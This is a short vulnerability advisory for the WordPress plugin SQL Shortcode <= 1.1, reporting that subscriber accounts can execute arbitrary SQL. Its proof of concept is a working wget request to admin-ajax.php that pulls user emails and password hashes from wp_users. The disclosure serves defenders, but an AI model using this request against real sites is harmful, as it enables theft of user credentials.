SQL Shortcode <= 1.1 – Authenticated SQL Execution

Description

It's not an SQL injection actually, it's just executing SQL with an account as low-privileged as a subscriber. The plugin description says it all.

This (https://blog.sucuri.net/2016/08/sql-injection-vulnerability-ninja-forms.html) great article will help understanding how to exploit shortcodes and why this works.

Vulnerabilities:

Execute whatever SQL you want to execute.

Found by:

Paul Dannewitz

Other vulnerabilities I submitted to wpvulndb: https://wpvulndb.com/search?utf8=%E2%9C%93&text=Paul+Dannewitz

Proof of Concept

wget --load-cookies cookie_file_with_cookies_of_just_a_subscriber_account.txt --post-data="action=parse-media-shortcode&shortcode=[sql]SELECT user_email, user_pass FROM wp_users[/sql]" wordpress.app/wp-admin/admin-ajax.php

Make sure the cookie file has the right format (Netscape), useful converter: http://crdx.org/misc/cookies/